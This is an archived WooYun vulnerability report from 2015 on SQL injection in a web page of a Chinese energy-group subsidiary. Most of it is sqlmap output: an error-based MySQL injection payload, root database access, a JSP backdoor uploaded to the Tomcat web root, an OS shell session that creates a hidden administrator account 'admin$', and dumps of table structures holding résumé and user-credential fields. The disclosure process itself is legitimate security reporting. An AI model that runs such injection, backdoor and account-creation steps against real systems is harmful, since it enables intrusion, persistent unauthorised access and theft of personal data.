乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-21: 细节已通知厂商并且等待厂商处理中 2015-08-24: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-09-03: 细节向核心白帽子及相关领域专家公开 2015-09-13: 细节向普通白帽子公开 2015-09-23: 细节向实习白帽子公开 2015-10-08: 细节向公众公开
世界500强陕西煤业化工集团某分站存在sql注入漏洞,暴露大量信息,jsp脚本,root权限,可直接提权漏洞页面:http://**.**.**.**/web/yjy?id=38
[20:06:19] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request[20:06:51] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the requestGET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection points with a total of 161 HTTP(s) requests:---Place: GETParameter: id Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=38 AND (SELECT 2021 FROM(SELECT COUNT(*),CONCAT(0x71676d6571,(SELECT (CASE WHEN (2021=2021) THEN 1 ELSE 0 END)),0x7176696b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)---[20:07:43] [INFO] the back-end DBMS is MySQLweb application technology: JSPback-end DBMS: MySQL 5.0[20:07:43] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/**.**.**.**'[*] shutting down at 20:07:43
[20:07:58] [INFO] fetching current user[20:07:59] [INFO] retrieved: root@localhostcurrent user is DBA: True[20:07:59] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/**.**.**.**'
do you want to try the same method used for the file stager? [Y/n] y[20:26:28] [INFO] the backdoor has been successfully uploaded on '/apache-tomcat-7.0.35/webapps/sxccti' - http://**.**.**.**:80/sxccti/tmpbnhay.jsp[20:26:28] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTERos-shell> net userdo you want to retrieve the command standard output? [Y/n/a] command standard output:---\WIN-IMDOU5E7KPA 的用户帐户-------------------------------------------------------------------------------Administrator Guest 命令成功完成。---os-shell> net user admin$ jiankeabc123 /adddo you want to retrieve the command standard output? [Y/n/a] command standard output:---命令成功完成。---os-shell> net localgroup administrators admin$ /adddo you want to retrieve the command standard output? [Y/n/a] command standard output:---命令成功完成。---os-shell> net userdo you want to retrieve the command standard output? [Y/n/a] command standard output:---\WIN-IMDOU5E7KPA 的用户帐户-------------------------------------------------------------------------------Administrator Guest 命令成功完成。
Database: websfTable: resume[26 columns]+-----------------+--------------+| Column | Type |+-----------------+--------------+| address | varchar(255) || birthday | varchar(255) || census | varchar(255) || college | varchar(255) || component_id | int(11) || contact | varchar(255) || country | varchar(255) || createTime | timestamp || degree | varchar(255) || email | varchar(255) || employ_id | int(11) || finishTime | varchar(255) || foreignLanguage | text || id | int(11) || jobHistory | text || marriage | varchar(255) || myself | text || name | varchar(255) || nation | varchar(255) || party | varchar(255) || sex | varchar(255) || skill | text || speciality | varchar(255) || studyHistory | text || updateTime | timestamp || zipcode | varchar(255) |+-----------------+--------------+
Database: websfTable: employ[14 columns]+--------------+--------------+| Column | Type |+--------------+--------------+| amount | varchar(255) || component_id | int(11) || createTime | timestamp || degree | varchar(255) || endTime | timestamp || id | int(11) || interfix | varchar(255) || name | varchar(255) || pay | varchar(255) || place | varchar(255) || publishTime | timestamp || sort | varchar(255) || synopsis | text || updateTime | timestamp |+--------------+--------------+
Database: websfTable: user[9 columns]+----------+--------------+| Column | Type |+----------+--------------+| id | int(11) || mobile | varchar(255) || org_id | int(11) || password | varchar(255) || phone | varchar(255) || realname | varchar(255) || state | int(11) || station | varchar(255) || username | varchar(255) |+----------+--------------+
如上,这里就简单的跑了一个库,里面还有党校啊那些库,信息量已给不少
过滤
危害等级:中
漏洞Rank:10
确认时间:2015-08-24 09:50
CNVD确认并复现所述情况,已经转由CNCERT向能源行业信息化主管部门通报,由其后续协调网站管理单位处置.
暂无